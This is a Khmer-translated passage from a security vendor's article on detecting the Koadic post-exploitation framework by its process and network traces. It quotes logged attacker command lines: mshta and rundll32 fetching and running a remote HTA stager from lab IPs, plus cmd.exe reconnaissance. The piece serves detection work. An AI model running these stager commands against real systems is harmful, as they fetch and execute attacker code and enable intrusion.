អថេរ GAWTUUGCFI ដែលមានគុណលក្ខណៈ WS ដែលធ្លាប់ស្គាល់គឺត្រូវបានទាមទារសម្រាប់ការប្រតិបត្តិកូដ។ ដោយមានជំនួយរបស់វា implant ហៅសែល ដំណើរការកូដពីរសាខា - shell.exec ជាមួយនឹងការត្រឡប់មកវិញនៃស្ទ្រីមទិន្នន័យលទ្ធផល និង shell.run ដោយមិនត្រឡប់មកវិញ។

Koadic មិនមែនជាឧបករណ៍ធម្មតាទេ ប៉ុន្តែវាមានវត្ថុបុរាណរបស់វា ដែលវាអាចត្រូវបានរកឃើញនៅក្នុងចរាចរណ៍ស្របច្បាប់៖

• ការបង្កើតពិសេសនៃសំណើ HTTP,
• ដោយប្រើ winHttpRequests API,
• ការបង្កើតវត្ថុ WScript.Shell តាមរយៈ ActiveXObject,
• រាងកាយធំដែលអាចប្រតិបត្តិបាន។

ការតភ្ជាប់ដំបូងត្រូវបានផ្តួចផ្តើមដោយ stager ដូច្នេះវាអាចរកឃើញសកម្មភាពរបស់វាតាមរយៈព្រឹត្តិការណ៍ Windows។ សម្រាប់ mshta នេះគឺជាព្រឹត្តិការណ៍ 4688 ដែលបង្ហាញពីការបង្កើតដំណើរការដែលមានគុណលក្ខណៈចាប់ផ្តើម៖

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

ខណៈពេលដែល Koadic កំពុងដំណើរការ អ្នកអាចមើលឃើញព្រឹត្តិការណ៍ 4688 ផ្សេងទៀតជាមួយនឹងគុណលក្ខណៈដែលកំណត់លក្ខណៈរបស់វាយ៉ាងល្អឥតខ្ចោះ៖

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

ការរកឃើញ

និន្នាការរស់នៅក្រៅដីកំពុងទទួលបានប្រជាប្រិយភាពក្នុងចំណោមឧក្រិដ្ឋជន។ ពួកគេប្រើប្រាស់ឧបករណ៍ និងយន្តការដែលបានបង្កើតនៅក្នុង Windows សម្រាប់តម្រូវការរបស់ពួកគេ។ យើងកំពុងឃើញឧបករណ៍ពេញនិយម Koadic, CrackMapExec និង Impacket តាមគោលការណ៍នេះកាន់តែខ្លាំងឡើងនៅក្នុងរបាយការណ៍ APT ។ ចំនួនសមនៅលើ GitHub សម្រាប់ឧបករណ៍ទាំងនេះក៏កំពុងកើនឡើងផងដែរ ហើយឧបករណ៍ថ្មីកំពុងលេចឡើង (មានប្រហែលមួយពាន់រួចទៅហើយ) ។ និន្នាការនេះកំពុងទទួលបានប្រជាប្រិយភាពដោយសារតែភាពសាមញ្ញរបស់វា៖ អ្នកវាយប្រហារមិនត្រូវការឧបករណ៍ភាគីទីបីទេ ពួកគេមាននៅលើម៉ាស៊ីនរបស់ជនរងគ្រោះរួចហើយ និងជួយពួកគេឱ្យជៀសផុតពីវិធានការសុវត្ថិភាព។ យើងផ្តោតលើការសិក្សាទំនាក់ទំនងបណ្តាញ៖ ឧបករណ៍នីមួយៗដែលបានពិពណ៌នាខាងលើទុកដានផ្ទាល់ខ្លួនរបស់វានៅក្នុងចរាចរណ៍បណ្តាញ។ ការសិក្សាលម្អិតអំពីពួកវាបានអនុញ្ញាតឱ្យយើងបង្រៀនផលិតផលរបស់យើង។ ការរកឃើញការវាយប្រហារបណ្តាញ PT រកឃើញពួកវា ដែលនៅទីបំផុតជួយស៊ើបអង្កេតខ្សែសង្វាក់ទាំងមូលនៃឧប្បត្តិហេតុតាមអ៊ីនធឺណិតដែលពាក់ព័ន្ធនឹងពួកគេ។

អ្នកនិពន្ធ:

• លោក Anton Tyurin ប្រធាននាយកដ្ឋានសេវាកម្មអ្នកជំនាញ មជ្ឈមណ្ឌលសន្តិសុខ PT Expert បច្ចេកវិទ្យាវិជ្ជមាន
• Egor Podmokov អ្នកជំនាញ PT Expert Security Center បច្ចេកវិទ្យាវិជ្ជមាន

ប្រភព: www.habr.com